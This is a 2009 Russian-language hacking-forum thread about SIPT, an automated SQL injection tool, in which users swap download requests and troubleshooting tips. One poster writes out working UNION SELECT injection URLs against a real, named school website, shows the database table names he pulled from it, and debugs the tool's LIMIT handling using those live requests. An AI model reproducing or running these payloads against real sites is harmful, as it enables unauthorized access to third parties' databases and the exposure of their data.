Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.04.2009, 22:30
|
|
Познающий
Регистрация: 29.03.2009
Сообщений: 36
Провел на форуме: 595180
Репутация:
11
|
|
бля на файлбим закиньте некачаеться
|
|
|

13.04.2009, 18:05
|
|
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме: 26253
Репутация:
7
|
|
а чё с сайтом? там редирект на какой-то левак 
|
|
|

15.04.2009, 16:56
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
Провел на форуме: 2816163
Репутация:
158
|
|
пыщьь . Если у кого есть, поделитесь 3-й версией.
|
|
|

17.04.2009, 04:52
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме: 599789
Репутация:
227
|
|
третья версия
огромный респект за прогу, улчше третьей версии и панголина в тыщи раз)) на данный момент самая крутая прога для работу с мускулями =)
Последний раз редактировалось o3,14um; 17.04.2009 в 05:10..
|
|
|

31.05.2009, 12:48
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
Беда в следующем. Пробую разные сайты подверженные SQL INJ вручную таблицы и колонки из Information_Schema выдёргиваются нормально. С помощью SIPT нормально получается выводить версию БД итд... НО удаётся получить только таблицу COLLATIONS. В чём проблема?

|
|
|

31.05.2009, 18:56
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
может просто не быть прав на чтение, или пустые все остальные, что врядли. Вообще SIPT4 - ахрененная штука, но только после детального анализа РУЧКАМИ.
Плюс у тебя не стоит галочка напротив Encoding AES - очень может быть в этом всё дело. Или РУЧКАМИ в браузере попробуй unhex(hex(ДАННЫЕ))
Да, SIPT4 - это чудо, но чудо автоматизации, а что-либо автоматизировать можно только когда знаешь весь процесс от и до.
|
|
|

31.05.2009, 19:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме: 4358210
Репутация:
2017
|
|
может быть что просто БД разные))))не обязательно что стоит тока infor.... могут быть и другие)))
|
|
|

31.05.2009, 20:04
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
вручную таблицы и колонки из Information_Schema выдёргиваются нормально
галка Encoding AES не помогла
|
|
|

31.05.2009, 20:24
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
Рассмотрим на живом примере теперь.
http://www.tauntonschool.co.uk/foundation/index.php?id=-539'+union+select+1,2,GROUP_CONCAT(table_name),4+f rom+information_schema.tables+--+
Видим таблицы:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATIST ICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIG GERS,USER_PRIVILEGES,VIEWS,courier_news_files,cour ier_news_schools,events,events_images,file_categor ies,file_categories_dev,............
Теперь скормим программе:
Опять нашёл только одну таблицу. WTF??
Последний раз редактировалось farpost; 31.05.2009 в 20:34..
|
|
|

31.05.2009, 20:49
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме: 190310
Репутация:
7
|
|
Проблему нашёл:
SIPT делает два запроса:
Превый:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+
Результатом выполнения которого появляется 1я таблица (непонятно почему нулевая отбрасывается).
Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.
В итоге получается такой запрос:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+2,1--+
Который само собой ничего не выводит.
Второй запрос должен быть таким:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+1,1--+
Это у меня сборка такая косячная или я чего то не догоняю???
_____________________________
И наконец то нашёл косяк в том что стоит галка AddLimit.
То что изменяется limit вконце помоему всё равно косяк большой. Хорошо бы поправить. Если не понятно, почему я считаю это косяком, могу разъяснить.
Последний раз редактировалось farpost; 31.05.2009 в 21:21..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|